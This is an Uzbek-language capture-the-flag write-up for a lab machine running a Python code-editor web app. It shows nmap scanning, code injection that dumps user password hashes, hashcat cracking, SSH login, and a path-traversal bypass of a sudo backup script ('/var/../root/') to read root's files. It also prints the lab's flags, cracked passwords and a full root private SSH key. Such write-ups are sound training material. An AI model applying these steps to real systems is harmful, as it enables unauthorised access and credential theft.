Code

Umumiy Ma’lumotlar
IP address 10.10.11.62

Operatsion Tizim Nomi (Distribution) Ubuntu 20.04.6 LTS

Operatsion Tizim Kernel Verisyasi Linux 5.4.0-208-generic

Web Server dasturi va Versiyasi gunicorn (version 20.0.4)

Ochiq Portlar 22, 5000

Topilgan Flaglar

💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari

flag topilgan ekran screenshotini ham ushbu bo’limga tashlang.

User Flag

💡 User Flag: fe82069d64eb4c62d8d1d9b1818045ed

Code 1
 Root Flag

💡 Root Flag: fb1533b55157413073bf2d0b16417294

Toplgan Zaifliklar

💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot
olish uchun link qoldirasiz. U zaiflik nimalarga saba bo’lishi va qaysi
explit orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak.
Birnchida keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta
zaiflik topa olsangiz barchasini kiriting.

Code 2
 Ushbu CVE x dasturining 2.X.X-versiyasida
mavjud bo’lib, hujumchiga X hujumni amalga Exploit linki
CVE-XXXX-XXXX oshirishga yordam beradi. Bu zaiflik X zailik deb berilishi kerak agar
ataladi. Ushu havola orqali batafsil o’rganib mavjud bo’lsa
chiqish mumkin. [Link qoldirasiz.]

Hisobot

💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar,

foydalanilgan explitlar bilan tushuntirib yozing.

Enumeration (Ma’lumot to’plash)

㉿
┌──(kali kali)-[~]
└─$ nmap -sSCV -Pn 10.10.11.62 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 16:10 EDT
Nmap scan report for 10.10.11.62
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; p
rotocol 2.0)
| ssh-hostkey:
| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)

Code 3
 |_ 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open http Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://

nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.40 seconds

Bizda 5000 port bor endi unga kirib ko’ramiz

Exploitation (Buzib kirish)

Bizda code yozish uchun website bor Endi biz zararli code orqali passwordlarni
olishga harakat qilamiz

print([(user.id, user.username, user.password) for user in User.query.all()])

Code 4
 [(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'),
(2, 'martin', '3de6f30c4a09c27fc71932bfc68474be')]

Endi biz bu hashlarni passwordini hashcat bilan topamiz

㉿
┌──(kali kali)-[~]
└─$ echo "3de6f30c4a09c27fc71932bfc68474be" | hashid
Analyzing '3de6f30c4a09c27fc71932bfc68474be'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM

Code 5
 [+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x

MD5ga hashcat ishlatib ko’ramiz

㉿
┌──(kali kali)-[~]
└─$ hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC,

LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl projec
t]
=====================================================
=====================================================
==================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i7-12700H, 1242/
2548 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0

Maximum password length supported by kernel: 256

Hashes: 2 digests; 2 unique digests, 1 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotat
es
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

Code 6
 ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performa
nce.
If you want to switch to optimized kernels, append -O to your commandlin
e.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:

* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921518
* Keyspace..: 14344387
* Runtime...: 1 sec

759b74ce43947f5f4c91aeddc3e5bad3:development
3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes.txt
Time.Started.....: Thu Mar 27 15:08:44 2025 (2 secs)
Time.Estimated...: Thu Mar 27 15:08:46 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3041.7 kH/s (0.07ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (ne
w)
Progress.........: 5227520/14344387 (36.44%)
Rejected.........: 0/5227520 (0.00%)
Restore.Point....: 5226496/14344387 (36.44%)

Code 7
 Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: nag3m16 -> naekgunung
Hardware.Mon.#1..: Util: 35%

Started: Thu Mar 27 15:08:41 2025

Stopped: Thu Mar 27 15:08:47 2025

development:development
martin:nafeelswordsmaster
Initial Access (Kirish huquqiga erishish)
endi martinga ssh qilin bog’lanib ko’ramiz

㉿
┌──(kali kali)-[~]
└─$ ssh martin@10.10.11.62
The authenticity of host '10.10.11.62 (10.10.11.62)' can't be established.
ED25519 key fingerprint is SHA256:AlQsgTPYThQYa3z9ZAHkFiO/LqXA6T
55FoT58A1zlAY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.62' (ED25519) to the list of known ho
sts.
martin@10.10.11.62's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Thu 27 Mar 2025 07:13:59 PM UTC

System load: 0.85

Usage of /: 49.0% of 5.33GB
Memory usage: 13%
Swap usage: 0%

Code 8
 Processes: 265
Users logged in: 0
IPv4 address for eth0: 10.10.11.62
IPv6 address for eth0: dead:beef::250:56ff:fe94:f466

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.

See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Last login: Thu Mar 27 19:14:02 2025 from 10.10.15.7

martin@code:~$

Endi huquqlarimizni tekshiramiz

Code 9
 martin@code:~$ sudo -l
Matching Defaults entries for martin on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/us
r/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User martin may run the following commands on localhost:

(ALL : ALL) NOPASSWD: /usr/bin/backy.sh
martin@code:~$ cat /usr/bin/backy.sh
#!/bin/bash

if [[ $# -ne 1 ]]; then

/usr/bin/echo "Usage: $0 <task.json>"
exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then

/usr/bin/echo "Error: File '$json_file' not found."
exit 1
fi

allowed_paths=("/var/" "/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./";

""))' "$json_file")

/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.dir

ectories_to_archive[]')

is_allowed_path() {
local path="$1"
for allowed_path in "${allowed_paths[@]}"; do

Code 10
 if [[ "$path" == $allowed_path* ]]; then
return 0
fi
done
return 1
}

for dir in $directories_to_archive; do

if ! is_allowed_path "$dir"; then
/usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ a
nd /home/ are allowed."
exit 1
fi
done

/usr/bin/backy "$json_file"

Bu Bash skript berilgan JSON fayl ( task.json ) ichidagi "directories_to_archive"

massivida joylashgan kataloglarni tekshiradi va ularni "/var/" yoki "/home/"
ichida joylashgan bo‘lishiga majbur qiladi.

Skript qanday ishlaydi?

1. Argument tekshiradi – Faqat bitta argument ( task.json ) qabul qilishi kerak.

2. Fayl mavjudligini tekshiradi – JSON faylni topa olmasa, xatolik chiqaradi.

3. Yo‘llarni xavfsiz qiladi – jq yordamida "../" ni o‘chirib tashlaydi.

4. Ruxsat etilgan kataloglarni tekshiradi – Faqat "/var/" yoki "/home/"

ichidagi kataloglarga ruxsat beradi.

5. Xatolik bo‘lmasa, /usr/bin/backy "$json_file" buyrug‘ini ishga tushiradi.

martin@code:~$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

Code 11
 sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/
nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/system
d:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nolo
gin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/system
d:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologi
n
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app-production:x:1001:1001:,,,:/home/app-production:/bin/bash

Code 12
 martin:x:1000:1000:,,,:/home/martin:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

Endi biz script o’zgartirib user.txt olishga harakat qilib ko’ramiz

martin@code:~/backups$ cat task.json

{
"destination": "/home/martin/",
"multiprocessing": true,
"verbose_log": false,
"directories_to_archive": [
"/home/app-production/user.txt"
],
"exclude": [
".*"
]
}
martin@code:~/backups$ sudo /usr/bin/backy.sh task.json
2025/03/27 19:29:36 🍀 backy 1.2
2025/03/27 19:29:36 📋 Working with task.json ...
2025/03/27 19:29:36 💤 Nothing to sync
2025/03/27 19:29:36 📤 Archiving: [/home/app-production/user.txt]
2025/03/27 19:29:36 📥 To: /home/martin ...
2025/03/27 19:29:36 📦
martin@code:~/backups$

Endi homega qaytib arxiv faylini ochamiz

Code 13
 martin@code:~$ tar -xjf code_home_app-production_user.txt_2025_Marc
h.tar.bz2
martin@code:~$ ll
total 44
drwxr-x--- 7 martin martin 4096 Mar 27 19:31 ./
drwxr-xr-x 4 root root 4096 Aug 27 2024 ../
drwxr-xr-x 2 martin martin 4096 Mar 27 19:30 backups/
lrwxrwxrwx 1 root root 9 Aug 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 220 Aug 27 2024 .bash_logout
-rw-r--r-- 1 martin martin 3771 Aug 27 2024 .bashrc
drwx------ 2 martin martin 4096 Mar 27 19:30 .cache/
-rw-r--r-- 1 root root 174 Mar 27 19:30 code_home_app-production_use
r.txt_2025_March.tar.bz2
drwxrwxr-x 3 martin martin 4096 Mar 27 19:31 home/
drwxrwxr-x 3 martin martin 4096 Mar 27 19:30 .local/
-rw-r--r-- 1 martin martin 807 Aug 27 2024 .profile
lrwxrwxrwx 1 root root 9 Aug 27 2024 .python_history -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 27 2024 .sqlite_history -> /dev/null
drwx------ 2 martin martin 4096 Sep 16 2024 .ssh/
martin@code:~$ cd home/
martin@code:~/home$ ll
total 12
drwxrwxr-x 3 martin martin 4096 Mar 27 19:31 ./
drwxr-x--- 7 martin martin 4096 Mar 27 19:31 ../
drwxrwxr-x 2 martin martin 4096 Mar 27 19:31 app-production/
martin@code:~/home$ cd app-production/
martin@code:~/home/app-production$ ll
total 12
drwxrwxr-x 2 martin martin 4096 Mar 27 19:31 ./
drwxrwxr-x 3 martin martin 4096 Mar 27 19:31 ../
-rw-r----- 1 martin martin 33 Mar 27 19:13 user.txt
martin@code:~/home/app-production$ cat user.txt
fe82069d64eb4c62d8d1d9b1818045ed

Code 14
 Privilage Escalation (Huquqlarni oshirish)
Endi root.txt olishga harakat qilib ko’ramiz

martin@code:~/backups$ cat task.json

{
"destination": "/home/martin/",
"multiprocessing": true,
"verbose_log": true,
"directories_to_archive": [
"/var/../root/"
]
}
martin@code:~/backups$ sudo /usr/bin/backy.sh task.json
2025/03/27 19:38:42 🍀
backy 1.2
2025/03/27 19:38:42 📋
Working with task.json ...
2025/03/27 19:38:42 💤
Nothing to sync
2025/03/27 19:38:42 📤
Archiving: [/var/../root]
2025/03/27 19:38:42 📥
To: /home/martin ...
2025/03/27 19:38:42 📦
tar: Removing leading `/var/../' from member names
/var/../root/
/var/../root/.local/
/var/../root/.local/share/
/var/../root/.local/share/nano/
/var/../root/.local/share/nano/search_history
/var/../root/.sqlite_history
/var/../root/.profile
/var/../root/scripts/
/var/../root/scripts/cleanup.sh
/var/../root/scripts/backups/
/var/../root/scripts/backups/task.json
/var/../root/scripts/backups/code_home_app-production_app_2024_Augus
t.tar.bz2
/var/../root/scripts/database.db
/var/../root/scripts/cleanup2.sh

Code 15
 /var/../root/.python_history
/var/../root/root.txt
/var/../root/.cache/
/var/../root/.cache/motd.legal-displayed
/var/../root/.ssh/
/var/../root/.ssh/id_rsa
/var/../root/.ssh/authorized_keys
/var/../root/.bash_history
/var/../root/.bashrc

martin@code:~$ tar -xjf code_var_.._root_2025_March.tar.bz2

martin@code:~$ ll
total 56
drwxr-x--- 7 martin martin 4096 Mar 27 19:39 ./
drwxr-xr-x 4 root root 4096 Aug 27 2024 ../
drwxr-xr-x 2 martin martin 4096 Mar 27 19:38 backups/
lrwxrwxrwx 1 root root 9 Aug 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 220 Aug 27 2024 .bash_logout
-rw-r--r-- 1 martin martin 3771 Aug 27 2024 .bashrc
drwx------ 2 martin martin 4096 Mar 27 19:30 .cache/
-rw-r--r-- 1 root root 12829 Mar 27 19:38 code_var_.._root_2025_March.t
ar.bz2
drwxrwxr-x 3 martin martin 4096 Mar 27 19:38 .local/
-rw-r--r-- 1 martin martin 807 Aug 27 2024 .profile
lrwxrwxrwx 1 root root 9 Aug 27 2024 .python_history -> /dev/null
drwx------ 6 martin martin 4096 Mar 27 19:13 root/

Code 16
 lrwxrwxrwx 1 root root 9 Aug 27 2024 .sqlite_history -> /dev/null
drwx------ 2 martin martin 4096 Sep 16 2024 .ssh/
martin@code:~$ cd root/
martin@code:~/root$ ll
total 36
drwx------ 6 martin martin 4096 Mar 27 19:13 ./
drwxr-x--- 7 martin martin 4096 Mar 27 19:39 ../
lrwxrwxrwx 1 martin martin 9 Jul 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 3106 Dec 5 2019 .bashrc
drwx------ 2 martin martin 4096 Aug 27 2024 .cache/
drwxr-xr-x 3 martin martin 4096 Jul 27 2024 .local/
-rw-r--r-- 1 martin martin 161 Dec 5 2019 .profile
lrwxrwxrwx 1 martin martin 9 Jul 27 2024 .python_history -> /dev/null
-rw-r----- 1 martin martin 33 Mar 27 19:13 root.txt
drwxr-xr-x 3 martin martin 4096 Sep 16 2024 scripts/
lrwxrwxrwx 1 martin martin 9 Jul 27 2024 .sqlite_history -> /dev/null
drwx------ 2 martin martin 4096 Aug 27 2024 .ssh/
martin@code:~/root$ cat root.txt
fb1533b55157413073bf2d0b16417294
martin@code:~/root$

Endi id_rsa orqali rootga kiramiz

martin@code:~/root$ cd .ssh/
martin@code:~/root/.ssh$ ll
total 16
drwx------ 2 martin martin 4096 Aug 27 2024 ./
drwx------ 6 martin martin 4096 Mar 27 19:13 ../
-rw-r--r-- 1 martin martin 563 Aug 27 2024 authorized_keys
-rw------- 1 martin martin 2590 Aug 27 2024 id_rsa
martin@code:~/root/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAA
BlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAvxPw90VRJajgkjwxZqXr865V8He/HNHVlhp0CP
36OsKSi0DzIZ4K

Code 17
 sqfjTi/WARcxLTe4lkVSVIV25Ly5M6EemWeOKA6vdONP0QUv6F1xj8f4eChr
dp7BOhRe0+
zWJna8dYMtuR2K0Cxbdd+qvM7oQLPRelQIyxoR4unh6wOoIf4EL34aEvQD
ux+3GsFUnT4Y
MNljAsxyVFn3mzR7nUZ8BAH/Y9xV/KuNSPD4SlVqBiUjUKfs2wD3gjLA4ZQ
ZeM5hAJSmVe
ZjpfkQOdE+++H8t2P8qGlobLvboZJ2rghY9CwimX0/g0uHvcpXAc6U8JJqo
9U41WzooAi6
TWxWYbdO3mjJhm0sunCio5xTtc44M0nbhkRQBliPngaBYleKdvtGicPJb1Ltj
tE5lHpy+N
Ps1B4EIx+ZlBVaFbIaqxpqDVDUCv0qpaxIKhx/lKmwXiWEQIie0fXorLDqsjL7
5M7tY/u/
M7xBuGl+LHGNBnCsvjLvIA6fL99uV+BTKrpHhgV9AAAFgCNrkTMja5EzAA
AAB3NzaC1yc2
EAAAGBAL8T8PdFUSWo4JI8MWal6/OuVfB3vxzR1ZYadAj9+jrCkotA8yGeC
rKn404v1gEX
MS03uJZFUlSFduS8uTOhHplnjigOr3TjT9EFL+hdcY/H+Hgoa3aewToUXtPs
1iZ2vHWDLb
kditAsW3XfqrzO6ECz0XpUCMsaEeLp4esDqCH+BC9+GhL0A7sftxrBVJ0+
GDDZYwLMclRZ
95s0e51GfAQB/2PcVfyrjUjw+EpVagYlI1Cn7NsA94IywOGUGXjOYQCUplXm
Y6X5EDnRPv
vh/Ldj/KhpaGy726GSdq4IWPQsIpl9P4NLh73KVwHOlPCSaqPVONVs6KAIu
k1sVmG3Tt5o
yYZtLLpwoqOcU7XOODNJ24ZEUAZYj54GgWJXinb7RonDyW9S7Y7ROZR6
cvjT7NQeBCMfmZ
QVWhWyGqsaag1Q1Ar9KqWsSCocf5SpsF4lhECIntH16Kyw6rIy++TO7WP7
vzO8Qbhpfixx
jQZwrL4y7yAOny/fblfgUyq6R4YFfQAAAAMBAAEAAAGBAJZPN4UskBMR7
+bZVvsqlpwQji
Yl7L7dCimUEadpM0i5+tF0fE37puq3SwYcdzpQZizt4lTDn2pBuy9gjkfg/NM
sNRWpx7gp
gIYqkG834rd6VSkgkrizVck8cQRBEI0dZk8CrBss9B+iZSgqlIMGOIl9atHR/U
DX9y4LUd
6v97kVu3Eov5YdQjoXTtDLOKahTCJRP6PZ9C4Kv87l0D/+TFxSvfZuQ24J/Z
BdjtPasRa4

Code 18
 bDlsf9QfxJQ1HKnW+NqhbSrEamLb5klqMhb30SGQGa6ZMnfF8G6hkiJDts
54jsmTxAe7bS
cWnaKGOEZMivCUdCJwjQrwk0TR/FTzzgTOcxZmcbfjRnXU2NtJiaA8DJCb
3SKXshXds97i
vmNjdD59Py4nGXDdI8mzRfzRS/3jcsZm11Q5vg7NbLJgiOxw1lCSH+TKl7KF
e0CEntGGA9
QqAtSC5JliB2m5dBG7IOUBa8wDDN2qgPN1TR/yQRHkB5JqbBWJwOuOHS
u8qIR3FzSiOQAA
AMEApDoMoZR7/CGfdUZyc0hYB36aDEnC8z2TreKxmZLCcJKy7bbFlvUT8
UX6yF9djYWLUo
kmSwffuZTjBsizWwAFTnxNfiZWdo/PQaPR3l72S8vA8ARuNzQs92Zmqsrm
93zSb4pJFBeJ
9aYtunsOJoTZ1UIQx+bC/UBKNmUObH5B14+J+5ALRzwJDzJw1qmntBkXO
7e8+c8HLXnE6W
SbYvkkEDWqCR/JhQp7A4YvdZIxh3Iv+71O6ntYBlfx9TXePa1UAAAAwQD45
KcBDrkadARG
vEoxuYsWf+2eNDWa2geQ5Po3NpiBs5NMFgZ+hwbSF7y8fQQwByLKRvrt8
inL+uKOxkX0LM
cXRKqjvk+3K6iD9pkBW4rZJfr/JEpJn/rvbi3sTsDlE3CHOpiG7EtXJoTY0OoIB
yBwZabv
1ZGbv+pyHKU5oWFIDnpGmruOpJqjMTyLhs4K7X+1jMQSwP2snNnTGrOb
Wbzvp1CmAMbnQ9
vBNJQ5xW5lkQ1jrq0H5ugT1YebSNWLCIsAAADBAMSIrGsWU8S2PTF4kSb
UwZofjVTy8hCR
lt58R/JCUTIX4VPmqD88CJZE4JUA6rbp5yJRsWsIJY+hgYvHm35LAArJJid
QRowtI2/zP6
/DETz6yFAfCSz0wYyB9E7s7otpvU3BIuKMaMKwt0t9yxZc8st0cev3ikGrVa3
yLmE02hYW
j6PbYp7f9qvasJPc6T8PGwtybdk0LdluZwAC4x2jn8wjcjb5r8LYOgtYI5Kxuz
sEY2EyLh
hdENGN+hVCh//jFwAAAAlyb290QGNvZGU=
-----END OPENSSH PRIVATE KEY-----
martin@code:~/root/.ssh$

Endi prive_key olib kaliga saqlimiz va chmod 600 huquqini berib rootga ssh
orqali bog’lanamiz

Code 19
 ㉿
┌──(kali kali)-[~]
└─$ vim id
㉿
┌──(kali kali)-[~]
└─$ chmod 600 id

㉿
┌──(kali kali)-[~]
└─$ ssh -i id root@10.10.11.62
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Thu 27 Mar 2025 07:48:10 PM UTC

System load: 0.0

Usage of /: 51.4% of 5.33GB
Memory usage: 14%
Swap usage: 0%
Processes: 246
Users logged in: 1
IPv4 address for eth0: 10.10.11.62
IPv6 address for eth0: dead:beef::250:56ff:fe94:f466

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.

See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Code 20
 Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Che
ck your Internet connection or proxy settings

Last login: Thu Mar 27 19:48:10 2025 from 10.10.15.7

root@code:~# ll
total 36
drwx------ 6 root root 4096 Mar 27 19:49 ./
drwxr-xr-x 18 root root 4096 Feb 24 19:44 ../
lrwxrwxrwx 1 root root 9 Jul 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Aug 27 2024 .cache/
drwxr-xr-x 3 root root 4096 Jul 27 2024 .local/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
lrwxrwxrwx 1 root root 9 Jul 27 2024 .python_history -> /dev/null
-rw-r----- 1 root root 33 Mar 27 19:49 root.txt
drwxr-xr-x 3 root root 4096 Sep 16 2024 scripts/
lrwxrwxrwx 1 root root 9 Jul 27 2024 .sqlite_history -> /dev/null
drwx------ 2 root root 4096 Aug 27 2024 .ssh/
root@code:~# id
uid=0(root) gid=0(root) groups=0(root)
root@code:~# hostnamectl
Static hostname: code
Icon name: computer-vm
Chassis: vm
Machine ID: 29b75301340e4b99a4db1d7380c8170f
Boot ID: 621c6557932a4ef5938c9a192d327b5a
Virtualization: vmware
Operating System: Ubuntu 20.04.6 LTS
Kernel: Linux 5.4.0-208-generic
Architecture: x86-64
root@code:/var# netstat -tulnp | grep 5000
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN 1207/pytho
n3
root@code:/var# ps -fp 1207
UID PID PPID C STIME TTY TIME CMD

Code 21
 app-pro+ 1207 1 0 19:50 ? 00:00:00 /usr/bin/python3 /usr/bin/gu
nicorn --workers 8 --bind 0.0.0.0:5000 --access-logfile /dev/null --error-lo
gfile /dev/null app:app
root@code:/var# ls -l /proc/1207/cwd
lrwxrwxrwx 1 app-production app-production 0 Mar 27 19:53 /proc/1207/c
wd -> /home/app-production/app
root@code:/var# gunicorn --version
gunicorn (version 20.0.4)
=====================================================
===========================
root@code:/home/app-production/app# lsof +D /home/app-production/ap
p
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 1359 root cwd DIR 253,0 4096 157206 /home/app-pro
duction/app
gunicorn 31254 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31258 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31259 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31260 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31261 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31262 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31263 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31264 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
gunicorn 31265 app-production cwd DIR 253,0 4096 157206 /home/a
pp-production/app
lsof 31760 root cwd DIR 253,0 4096 157206 /home/app-prod
uction/app
lsof 31761 root cwd DIR 253,0 4096 157206 /home/app-prod

Code 22
 uction/app
root@code:~# cat /proc/31254/cmdline
/usr/bin/python3 /usr/bin/gunicorn --workers 8 --bind 0.0.0.0:5000 --acce
ss-logfile /dev/null --error-logfile /dev/null app:app

Code 23